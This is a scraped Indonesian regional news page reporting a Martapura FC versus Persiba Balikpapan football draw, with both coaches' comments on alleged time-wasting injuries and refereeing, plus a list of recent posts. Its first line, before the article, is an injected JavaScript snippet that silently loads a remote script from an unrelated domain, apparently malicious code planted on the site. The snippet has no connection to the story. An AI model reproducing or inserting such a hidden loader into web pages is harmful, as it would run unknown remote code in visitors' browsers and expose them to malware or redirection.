(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Sepak Bola

Pemain Persiba Sering Cidera, Tempo Permainan Pancing Emosi Suporter


MARTAPURA, Atmosfir ketegangan permainan lanjutan yang mempertemukan Martapura FC vs Persiba Balikpapan sangat terasa. Gemuruh seruan pendukung Martapura FC yang nampak kecewaan terhadap ulah permainan Persiba Balikpapan yang sedikit-sedikit cidera ketika bergesekan antar pemain di Stadion Demang Lehman Martapura, Selasa (9/10).

Dalam pertandingan yang berjalan nampak cukup keras tersebut, nampak di babak kedua sejumlah pelanggaran benturan-benturan pemain sering terjadi. Dampaknya terlihat terhadap permainan Persiba Balikpapan yang  sering jatuh dan cidera sehingga sering ditandu keluar lapangan. Hal ini menimbulkan kesan drama bagi suporter Martapura FC yang seakan memperlambat tempo permainan.

Dengan keadaan seakan mengulur waktu tempo permainan tersebut, lantas juga memancing emosi beberapa pemain Martapura FC. Alhasil, bakupukul pun hampir terjadi dipertandingan yang disaksikan oleh ribuan pasang mata tersebut.

Ketika sesi jumpa pers, Pelatih Kepala Persiba Balikpapan Haryadi mengatakan dalam hasil imbang tersebut pihaknya mendapatkan satu point untuk memasuki laga berikutnya. Sementara terkait dugaan drama cidera yang sangat sering terjadi untuk memperlambat tempo permainan Haryadi berdalil kondisi anak asuhnya yang memang kelelahan karea kurang istirahat.

“Mereka banyak tumbang pada babak kedua itu, bukan merupakan suatu strategi, mereka hanya kelelahan, karena istirahannya yang kurang, sehingga itu sangat menguras tenaga,” akunya.

Sementara itu disisi lain, Pelatih Kepala Martapura FC Frans Sinarta Huwae napak mengutarakan kekecewaannya karena dikandang sendiri hanya bisa meraih satu poin. Ia nampak sangat tidak puas dengan beberapa keputusan oleh wasit.

“Di home kita kekurangan dua point, itu tidak ada dalam mimpi kami, namun itulah hasil dari pertandingan, namun jujur saya hari ini sangat kecewa dengan keputusan wasit, membiarkan lawan yang memperlambat waktu atau tempo permainan,” ucapnya.

Dia mengatakan itu memang taktik mereka namun kepemimpinan keputusan wasit yang kebanyakan membiarkan beberapa pelangaran nampak menunda tempo permainan, seakan anak asuknya sengaja dibuat emosi dengan putusan wasit dan permainan lawan.

“Taktik mereka (Persiba Balikpapan) memang jalan, namun inikah sepakbola, putusan wasit sendiri yang mengundang anak-anak asuh kita untuk berbuat kurang ajar, kita seakan diatur orang dirumah sendiri, namaun inilah hasil maksimal yang sudah diraih anak-anak saya tetap bersyukur” ujarnya. (rendy)

Reporter: Rendy
Editor: Chell

Desy Arfianty

Recent Posts

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

4 menit ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

14 menit ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

26 menit ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

5 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

6 jam ago

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

7 jam ago

This website uses cookies.